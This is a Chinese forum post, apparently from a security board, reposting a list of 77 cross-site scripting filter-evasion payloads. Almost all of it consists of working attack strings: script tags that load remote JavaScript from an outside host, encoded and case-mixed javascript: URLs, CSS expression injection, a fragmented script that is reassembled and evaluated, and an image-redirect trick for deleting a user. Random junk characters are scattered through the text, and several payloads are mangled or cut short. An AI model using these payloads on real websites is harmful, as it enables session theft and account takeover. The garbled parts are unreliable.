貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。9 b9 ?# L6 a# n- v; `( t
3 P6 z# ? m( ~( {- ?' q (1)普通的XSS JavaScript注入! X" `# S2 L) o
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ b. x% n7 y0 g; l
; \0 W6 t0 K2 b, p5 t+ p/ e9 U (2)IMG标签XSS使用JavaScript命令
0 C% O" @) a1 z) n( N3 n; W) P# j <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; p1 {7 K7 i2 }6 j3 Z
* ]. M U, ~! F0 Y, [ (3)IMG标签无分号无引号3 i& g4 Z* ?' p; t: \
<IMG SRC=javascript:alert(‘XSS’)>' X. v* T, H9 U
4 i4 k( c: a2 Q1 e6 `/ k0 Z1 {+ n0 G
(4)IMG标签大小写不敏感
1 e6 p0 k |7 A& V2 d( u <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
' W, e% A2 z& R2 K: |$ V& g- W& x3 j
(5)HTML编码(必须有分号)
7 K N: Q8 s2 S! V( B m3 M <IMG SRC=javascript:alert(“XSS”)>
" j3 d0 h' ?1 [% v( D$ r0 q8 Z% {" f% k/ n9 r; ~8 n5 B5 C, ^
(6)修正缺陷IMG标签
( r Z N G. u9 d" r% j <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>) g3 h2 ?, H0 b
! c0 \4 r# U5 g* P" B, h (7)formCharCode标签(计算器), Z" i& }& P1 g. V' k
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
. G% m+ H* E' K& G1 h; h2 l' G. F
( n- i: G6 d2 h% w. M+ A# \ (8)UTF-8的Unicode编码(计算器)
( Z: b+ f' x& q. G1 g6 i <IMG SRC=jav..省略..S')>
( S0 n' n7 w% m4 B! L
( n. m/ c/ k$ g0 J (9)7位的UTF-8的Unicode编码是没有分号的(计算器)7 Q" W: H2 L3 @9 v9 u/ N2 z j2 S
<IMG SRC=jav..省略..S')>) ?3 D4 z. G! a' O
& h$ e- J W* e4 ~+ l. y (10)十六进制编码也是没有分号(计算器)
' c+ ?& X' k4 ^& Y <IMG SRC=java..省略..XSS')>7 Q4 c8 r: O; o4 D
$ q$ ~ P, a7 |$ F
(11)嵌入式标签,将Javascript分开1 }0 b b/ m. z5 U8 H s* u
<IMG SRC=”jav ascript:alert(‘XSS’);”>
: l7 L- r! c3 M7 X/ ^5 @- `) ~/ K7 Q* h
(12)嵌入式编码标签,将Javascript分开
) X+ G5 [$ t2 H+ M2 D# B <IMG SRC=”jav ascript:alert(‘XSS’);”>
* P( N% W6 L: t" ~ i* |' J
* \) o j: N& `& }1 g (13)嵌入式换行符
+ r5 q0 o9 g3 b0 ]. i6 e1 i <IMG SRC=”jav ascript:alert(‘XSS’);”>8 t" l" D* T# J4 e! f
: j, H( l8 F- |9 ^# o
(14)嵌入式回车
1 ]- G: k" H" l- x! m% |6 G, Y9 F <IMG SRC=”jav ascript:alert(‘XSS’);”>
7 t& t+ n. L8 d% |4 e$ A+ @' t! L( J
(15)嵌入式多行注入JavaScript,这是XSS极端的例子3 t0 z% t" C B. E H V) k$ w+ f: t
<IMG SRC=”javascript:alert(‘XSS‘)”>
$ }7 R" W; c) ?9 |8 b0 V3 ?5 u) @4 u0 `! f: ~, p# r
(16)解决限制字符(要求同页面)3 [" u; `" h/ [ Z
<script>z=’document.’</script>
! x- |* B- F: t: P, K <script>z=z+’write(“‘</script>
0 C! a8 _+ H4 x' C! B <script>z=z+’<script’</script>$ z: N N# \5 e
<script>z=z+’ src=ht’</script>5 {& w' H2 Q. D5 b3 v
<script>z=z+’tp://ww’</script>
( h1 A: K; U$ a) _, x! o5 g <script>z=z+’w.shell’</script>2 W: [9 |; N2 {6 v5 N: S' z6 W
<script>z=z+’.net/1.’</script>
, Z+ ] Q; T* _% E( G <script>z=z+’js></sc’</script>% x9 G" X8 i. |7 D
<script>z=z+’ript>”)’</script>
( D! h# `- ~) w4 v) y <script>eval_r(z)</script>" o( `- y, c6 T& }0 r7 @$ B* E
% \1 @$ _" i3 s3 ^5 P8 t5 o (17)空字符, s" ^$ q8 p7 c, B$ |9 ?5 t
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 v" v/ Z( D: U& y. d* g; Q r5 y1 t3 ^+ ]5 V. \
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用$ w0 h7 w" U1 c" A0 ?$ L) c6 L
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out: A& g2 d- c/ I! ^# o( Y2 B5 D
4 Z. |- F" I- @2 }3 I
(19)Spaces和meta前的IMG标签3 W5 k' d/ M8 n+ V8 a# F8 ~
<IMG SRC=” � javascript:alert(‘XSS’);”>
. B4 c4 t! ?- D9 J1 I/ w+ N E
1 P, z4 C- ^9 l (20)Non-alpha-non-digit XSS, h% R: i: ^1 }1 y$ @7 s
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
' j+ S! P: x( Q! R; i
( x, K5 ?! B- {3 U6 Q! A (21)Non-alpha-non-digit XSS to 2
3 N+ Z( C& }7 A" W, Z <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- t" }6 w, \. c" z' w; k
3 h4 L) T- e! v, a, w J% Q (22)Non-alpha-non-digit XSS to 32 m" C5 d9 e. x7 U4 a
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT> [+ M# k' d# K
$ L& z( g2 b6 K# D$ n9 ?# { (23)双开括号
$ } I* N2 n/ P+ l1 x# Q$ ]5 u <<SCRIPT>alert(“XSS”);//<</SCRIPT>; K8 n, E( ]) K5 i1 o
( ?6 y7 A9 x9 I7 I$ d' `+ }
(24)无结束脚本标记(仅火狐等浏览器)
4 S0 t2 `, O' g" k8 L <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
" l% N0 P+ g% V' @- ~* g) K: s# c, n0 m# q' ?6 A0 c
(25)无结束脚本标记2
) X7 G8 m j8 K2 u <SCRIPT SRC=//3w.org/XSS/xss.js>
8 b& H) E, Y3 O9 H
9 B9 e9 s" s2 W (26)半开的HTML/JavaScript XSS
; D* d [( [! B6 K <IMG SRC=”javascript:alert(‘XSS’)”
) X; m% Q; [" N% {9 Q
0 X E8 j- f# ?# H4 |6 U (27)双开角括号5 A! p$ V7 |( s
<iframe src=http://3w.org/XSS.html <
1 b, Y6 P' g+ Q. P8 Y8 H8 a$ ^3 @/ E. W! l9 k9 l9 r! W# T
(28)无单引号 双引号 分号2 k/ D, r3 S+ w% o- w3 ^" R8 H
<SCRIPT>a=/XSS/% X6 U8 q0 D9 r) L7 L) w
alert(a.source)</SCRIPT>
# s6 Z$ v' C0 ]: }4 a9 R) m
% y( J$ _7 W& f/ b* e5 S* j4 x% ` (29)换码过滤的JavaScript, B; W3 p" C0 x# k
\”;alert(‘XSS’);//
! |& I7 k2 C' W P5 W
: J$ V" u9 }; n (30)结束Title标签
9 w; t0 g( Z z, m </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
. [4 r, b8 w! d1 l4 Y, V1 W6 b' m! f; y4 J9 C
(31)Input Image! G) r- u0 Y* P- F* X3 J
<INPUT SRC=”javascript:alert(‘XSS’);”>
4 g0 i z, `5 |2 h+ d6 ]& Q6 m/ q3 H9 u
(32)BODY Image% V" C6 X" O: i: o6 q- ]+ {
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
N# O: a4 b( ?. X) ?' L
5 L% M3 u7 W6 } (33)BODY标签
/ Y9 v( N. I4 P: n" m" O6 t8 J6 b <BODY(‘XSS’)>4 X; c' K& `: y
1 ~+ Y& x0 s% ^- p8 Z (34)IMG Dynsrc$ X! p' ?9 {' q6 Z8 w6 [
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
) G% H3 G) f7 U5 x- E# [- s) H0 w! u G; s, q% d
(35)IMG Lowsrc3 S3 h X7 |! ]: X8 L
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
/ U/ q2 b% D( y0 s
; x0 u- @: n: B7 T" J$ u) C9 O (36)BGSOUND
9 `! {( D) r) _/ }) D8 J <BGSOUND SRC=”javascript:alert(‘XSS’);”>
+ k; Z' {; c: C6 L U( t* ~/ z/ ]
0 `5 \- ~1 F+ S4 l (37)STYLE sheet
8 R* H; Z& K8 i( u- d$ ]9 d1 Z <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>- F9 K3 U5 u, ~8 S1 ?4 n
& w$ B& Q& s6 L- ]
(38)远程样式表
: v) F& n6 `! ~) p <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
$ p7 X% K: n: g6 f
# _8 y& F# |3 v' x& o/ j( I (39)List-style-image(列表式); S9 ?% S6 Q4 R2 V' R; Q. l( c
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
+ l" w( o) c% g: ]- } @ l
8 B. U1 v( u- }0 e `: f. z! B/ B* n9 ? (40)IMG VBscript/ D& a" v2 P' f" b
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS% g% d) z# a; X% z: x8 O4 ^$ c
% k0 D4 Z: v: ~8 z; r& l$ | (41)META链接url5 I n2 {# p3 z$ I) W. w
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>4 f! D9 F/ g1 R8 i7 a. t
* K( b4 Q: J# F: O) P+ G9 l (42)Iframe
% w# b8 N8 y% d1 r <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>& `$ B+ g+ \; A
% g: c p( w1 s& M. X
(43)Frame; U N6 |3 ]1 R! k
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
5 x6 q7 n) j' J: C9 k! U, F5 F# ~. a5 n
(44)Table
* f- t; J) Q; a* z X* A) v <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>$ s$ L0 y% x0 M4 A7 N" P6 Y# _
' h) ^* h! C& B: O4 d! _3 K (45)TD$ i1 Y% K5 z- |0 C9 Y
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
$ @' \% j% P! f+ I2 C4 L
, k Q4 [! U6 B9 k7 l8 B (46)DIV background-image
1 p' W5 U: m7 x y' ^ <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>: V% k, y+ x5 _# B
( {# z4 d9 }3 V' O/ G (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279). X! S: h; A4 [2 ?% X! }+ C' F
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”> J3 q* `3 W5 j* i
5 F7 ]) I6 T. q0 K: _
(48)DIV expression- B- _6 ]0 O2 v5 N
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
5 i) S$ [/ V/ H1 z7 ^# j H6 F! X ^8 \, O
(49)STYLE属性分拆表达' c h8 S2 F. a) j) ~" u: G/ r( @
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
# L! O2 @% V3 ]4 \% w
7 h# t' c9 C7 z% o6 p+ R$ a (50)匿名STYLE(组成:开角号和一个字母开头)
+ D* h" L7 H k <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>/ t- `$ Q3 f; a* U' z5 n+ [
& q% j$ K( f" K6 g
(51)STYLE background-image
* O+ n3 U/ }. I' Q( t' Y <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>' J! o) N/ d! I* g) t
; v8 ]- z$ x b
(52)IMG STYLE方式
. ?& H4 A0 ^+ T9 \/ o, _ exppression(alert(“XSS”))’>+ o9 c% I/ B$ P7 ` ]
M( w. C; p) G0 j- O+ i
(53)STYLE background0 {2 [' o- ^& [) C9 G C/ w
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* n1 H1 F9 A( _3 Q. G" q' e' J" }/ G* Z0 W4 K
(54)BASE
& a! r0 o5 W: E/ Y( j <BASE HREF=”javascript:alert(‘XSS’);//”>
- s" Q: K$ C* d% J# G
. H: m# H1 K2 S (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS: F- k, X3 N- ?: l
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>0 N- c- A" z9 X$ V
8 |: |. ^( z* E9 ]+ r' ]6 E (56)在flash中使用ActionScrpt可以混进你XSS的代码" K7 E; a1 ^# w- ]
a=”get”;
1 B" ?6 y% @1 v( j4 W b=”URL(\”";
- M+ a) N7 A9 w, O: ^ c=”javascript:”;
! T1 P% V% ~ n& e d=”alert(‘XSS’);\”)”;# {2 c" L9 ^! x( X f; N& M3 a
eval_r(a+b+c+d);' f. o" L2 d, }$ ]0 r8 j
& x6 }( _! S% _4 ~/ Q1 n. h/ [
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
6 V1 G+ M$ l( S3 M# r# K/ s5 L <HTML xmlns:xss>
4 x' y( t9 a; `; i- T3 Z. n, t <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>5 c" S: W* j z, W$ p5 O
<xss:xss>XSS</xss:xss>7 p% N! I, s! V% ~
</HTML># n9 H' `. S% s) ~4 s/ W
0 d& R0 n M- Q# J0 H
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
3 O& y- {8 `/ @ <SCRIPT SRC=””></SCRIPT>
; S! r2 ]( b" I; L. D* Z# r3 A, I9 X
(59)IMG嵌入式命令,可执行任意命令3 [2 ], B0 ~# Q9 q$ N5 r! n# N/ N" B
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
, E ^. H' a; Y' ^
! R6 n' w4 M. T( I (60)IMG嵌入式命令(a.jpg在同服务器)
7 T' f& ^8 g- [: v Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
' |9 h/ ?! E5 ]% Z/ t: ]4 [/ V* h5 l# I3 i* i4 L7 e
(61)绕符号过滤# V2 U2 T. s/ t( \8 }
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 h, F/ S+ }3 l* z7 P0 L: Y8 T3 `* H0 m& L. e! y3 A; e9 N4 U
(62). L) Y* o' ~" [/ i5 }: k
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>0 g/ h6 n$ T2 x
, U; @, d: t9 L; [0 V
(63)) E, f L3 l2 ?- N( B+ h
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
3 r* L: G5 g1 F/ P2 M g0 b
: a/ j! O: n7 b# v# h (64)2 ^% f( @! i) J
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
& ]5 R @" r6 B, ]1 \3 H" F$ \: U# @- _6 Z" g; r* e. y
(65)
3 M* l7 ?: [2 J <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT># ], F9 ]' F2 G% C# `7 d6 w
: M9 H6 s, K3 B- {5 R' ? (66)
: y+ _2 w9 l5 D1 E <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>1 \3 \% l/ D$ o- |5 c
! d" Y) b3 o3 Y
(67)
1 {% G1 T& b* j) O6 I8 W <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>1 l4 k0 {3 e7 H( U6 d
1 S" c5 b- P. P
(68)URL绕行
! r! x: P; A3 m r1 K <A HREF=”http://127.0.0.1/”>XSS</A>
# M; j7 d, | ^0 d6 ]) j
7 q4 k& Q- }# }* g9 V6 W7 g (69)URL编码% B9 P8 \, D+ o4 L( l# V
<A HREF=”http://3w.org”>XSS</A>9 s0 x& U$ k! H5 l, _9 s
4 s- M' X3 v7 s
(70)IP十进制
: q6 m* W- P( o0 t <A HREF=”http://3232235521″>XSS</A>
1 F! O9 M a! L4 {/ U
# i. \) e2 z5 @ (71)IP十六进制/ W* X+ ]7 {0 g8 j/ ~
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
2 h2 m( a% X) g- b1 a8 u/ ]" g
( R' o' c' B' C (72)IP八进制; e- x! T) M& t6 v) W/ c
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
" |8 q2 ~, T# k% V- [7 ]
7 e4 ~5 X" b; _: N7 j c+ q (73)混合编码4 K# p2 v7 E& G; |
<A HREF=”h$ L- T* z( K; }; ]1 ?) b
tt p://6 6.000146.0×7.147/”">XSS</A>( }( p D1 K% X, r
8 [# I. C4 ^ a- J2 I1 t; F
(74)节省[http:]
- U2 w/ Y0 U, d. M6 o' U2 ~ H( W <A HREF=”//www.google.com/”>XSS</A>
; w& X/ h- U( ^4 t+ s. {$ [
( O/ p% g8 s+ v, X9 Q (75)节省[www]
8 D/ M2 U- t% O, F1 A1 K6 e <A HREF=”http://google.com/”>XSS</A>
0 f" H% N" i. B9 O p3 h8 i8 G& ?% S# }
(76)绝对点绝对DNS
6 l6 }; t# Y0 ? \& N& C <A HREF=”http://www.google.com./”>XSS</A>+ `3 K" E" z- h
* l4 G, C( Q, b- ~! [9 m (77)javascript链接. d+ |% R6 I- d; ~% |
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对